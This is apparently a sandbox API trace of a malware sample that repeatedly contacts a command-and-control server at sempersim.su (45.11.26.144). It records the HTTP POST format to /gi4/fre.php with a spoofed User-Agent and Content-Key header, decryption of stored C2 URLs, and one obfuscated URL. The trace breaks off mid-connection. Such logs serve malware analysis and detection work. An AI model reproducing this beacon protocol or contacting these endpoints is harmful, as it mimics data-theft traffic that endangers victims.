0x5cb0d8 [0255.125] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdc78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0255.130] GetProcessHeap () returned 0x5b0000 [0255.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8f0 [0255.130] socket (af=2, type=1, protocol=6) returned 0x398 [0255.130] connect (s=0x398, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0255.204] FreeAddrInfoW (pAddrInfo=0x5cdc78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0255.204] GetProcessHeap () returned 0x5b0000 [0255.204] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0255.204] GetProcessHeap () returned 0x5b0000 [0255.204] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0255.205] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0255.207] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0255.207] GetProcessHeap () returned 0x5b0000 [0255.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0255.207] GetProcessHeap () returned 0x5b0000 [0255.207] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0255.207] GetProcessHeap () returned 0x5b0000 [0255.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3668 [0255.208] GetProcessHeap () returned 0x5b0000 [0255.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0255.208] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0255.209] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0255.209] GetProcessHeap () returned 0x5b0000 [0255.209] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0255.209] GetProcessHeap () returned 0x5b0000 [0255.209] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0255.209] send (s=0x398, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0255.210] send (s=0x398, buf=0x5d1e18*, len=159, flags=0) returned 159 [0255.210] GetProcessHeap () returned 0x5b0000 [0255.210] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0255.210] recv (in: s=0x398, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0256.276] GetProcessHeap () returned 0x5b0000 [0256.276] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0256.276] GetProcessHeap () returned 0x5b0000 [0256.277] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0256.277] GetProcessHeap () returned 0x5b0000 [0256.277] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0256.277] GetProcessHeap () returned 0x5b0000 [0256.277] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0256.277] closesocket (s=0x398) returned 0 [0256.278] GetProcessHeap () returned 0x5b0000 [0256.278] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8f0 | out: hHeap=0x5b0000) returned 1 [0256.278] GetProcessHeap () returned 0x5b0000 [0256.278] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0256.278] GetProcessHeap () returned 0x5b0000 [0256.279] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3080 | out: hHeap=0x5b0000) returned 1 [0256.279] GetProcessHeap () returned 0x5b0000 [0256.279] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0256.279] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x424) returned 0x398 [0256.281] Sleep (dwMilliseconds=0xea60) [0256.300] GetProcessHeap () returned 0x5b0000 [0256.300] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3110 [0256.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.301] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0256.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.309] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0256.317] GetProcessHeap () returned 0x5b0000 [0256.317] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0256.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.318] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0256.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.319] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0256.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.320] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.320] GetProcessHeap () returned 0x5b0000 [0256.321] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0256.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.321] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3110, pdwDataLen=0xdfcfc | out: pbData=0x5d3110, pdwDataLen=0xdfcfc) returned 1 [0256.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.322] CryptDestroyKey (hKey=0x5bde08) returned 1 [0256.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.323] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0256.323] GetProcessHeap () returned 0x5b0000 [0256.323] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0256.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0256.324] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0256.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0256.325] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0256.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0256.326] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0256.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0256.326] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0256.326] GetProcessHeap () returned 0x5b0000 [0256.326] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0256.326] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0256.327] GetProcessHeap () returned 0x5b0000 [0256.327] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0256.327] GetProcessHeap () returned 0x5b0000 [0256.328] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0256.328] GetProcessHeap () returned 0x5b0000 [0256.328] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3110 | out: hHeap=0x5b0000) returned 1 [0256.328] GetProcessHeap () returned 0x5b0000 [0256.328] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0256.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.331] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0256.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.337] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0256.346] GetProcessHeap () returned 0x5b0000 [0256.346] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0256.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.347] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0256.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.348] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0256.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.349] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.349] GetProcessHeap () returned 0x5b0000 [0256.349] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0256.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.351] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0256.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.352] CryptDestroyKey (hKey=0x5bde08) returned 1 [0256.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0256.353] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0256.353] GetProcessHeap () returned 0x5b0000 [0256.353] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0256.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0256.355] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0256.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0256.356] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0256.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0256.357] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0256.357] GetProcessHeap () returned 0x5b0000 [0256.357] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0256.357] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdb10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0256.362] GetProcessHeap () returned 0x5b0000 [0256.362] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca950 [0256.362] socket (af=2, type=1, protocol=6) returned 0x39c [0256.362] connect (s=0x39c, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0256.431] FreeAddrInfoW (pAddrInfo=0x5cdb10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0256.431] GetProcessHeap () returned 0x5b0000 [0256.432] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5a20 [0256.432] GetProcessHeap () returned 0x5b0000 [0256.432] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0256.433] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0256.434] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0256.434] GetProcessHeap () returned 0x5b0000 [0256.434] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0256.434] GetProcessHeap () returned 0x5b0000 [0256.435] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0256.435] GetProcessHeap () returned 0x5b0000 [0256.435] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0256.435] GetProcessHeap () returned 0x5b0000 [0256.435] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0256.435] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0256.436] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0256.436] GetProcessHeap () returned 0x5b0000 [0256.436] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0256.436] GetProcessHeap () returned 0x5b0000 [0256.437] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0256.437] send (s=0x39c, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0256.438] send (s=0x39c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0256.438] GetProcessHeap () returned 0x5b0000 [0256.438] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0256.438] recv (in: s=0x39c, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0257.746] GetProcessHeap () returned 0x5b0000 [0257.746] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0257.746] GetProcessHeap () returned 0x5b0000 [0257.746] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0257.747] GetProcessHeap () returned 0x5b0000 [0257.747] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0257.747] GetProcessHeap () returned 0x5b0000 [0257.747] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5a20 | out: hHeap=0x5b0000) returned 1 [0257.747] closesocket (s=0x39c) returned 0 [0257.749] GetProcessHeap () returned 0x5b0000 [0257.749] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca950 | out: hHeap=0x5b0000) returned 1 [0257.749] GetProcessHeap () returned 0x5b0000 [0257.749] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0257.749] GetProcessHeap () returned 0x5b0000 [0257.750] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0257.750] GetProcessHeap () returned 0x5b0000 [0257.750] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0257.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc10) returned 0x39c [0257.757] Sleep (dwMilliseconds=0xea60) [0257.827] GetProcessHeap () returned 0x5b0000 [0257.827] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d35d8 [0257.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.830] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0257.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.839] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0257.894] GetProcessHeap () returned 0x5b0000 [0257.894] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0257.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.895] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0257.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.896] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0257.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.897] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.897] GetProcessHeap () returned 0x5b0000 [0257.898] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0257.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.899] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d35d8, pdwDataLen=0xdfcfc | out: pbData=0x5d35d8, pdwDataLen=0xdfcfc) returned 1 [0257.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.900] CryptDestroyKey (hKey=0x5be048) returned 1 [0257.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.901] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0257.901] GetProcessHeap () returned 0x5b0000 [0257.901] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0257.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0257.902] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0257.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0257.903] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0257.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0257.904] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0257.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0257.905] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0257.905] GetProcessHeap () returned 0x5b0000 [0257.905] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0257.907] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0257.907] GetProcessHeap () returned 0x5b0000 [0257.907] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0257.907] GetProcessHeap () returned 0x5b0000 [0257.908] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0257.908] GetProcessHeap () returned 0x5b0000 [0257.908] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d35d8 | out: hHeap=0x5b0000) returned 1 [0257.908] GetProcessHeap () returned 0x5b0000 [0257.908] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3428 [0257.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.909] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0257.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.915] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0257.923] GetProcessHeap () returned 0x5b0000 [0257.923] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0257.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.924] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0257.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.925] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0257.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.926] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.926] GetProcessHeap () returned 0x5b0000 [0257.927] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0257.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.928] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3428, pdwDataLen=0xdfcfc | out: pbData=0x5d3428, pdwDataLen=0xdfcfc) returned 1 [0257.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.929] CryptDestroyKey (hKey=0x5bde08) returned 1 [0257.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0257.930] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0257.930] GetProcessHeap () returned 0x5b0000 [0257.930] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0257.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0257.931] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0257.931] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0257.932] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0257.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0257.933] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0257.933] GetProcessHeap () returned 0x5b0000 [0257.933] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0257.933] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdd18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0258.001] GetProcessHeap () returned 0x5b0000 [0258.001] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8b0 [0258.001] socket (af=2, type=1, protocol=6) returned 0x3a0 [0258.001] connect (s=0x3a0, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0258.120] 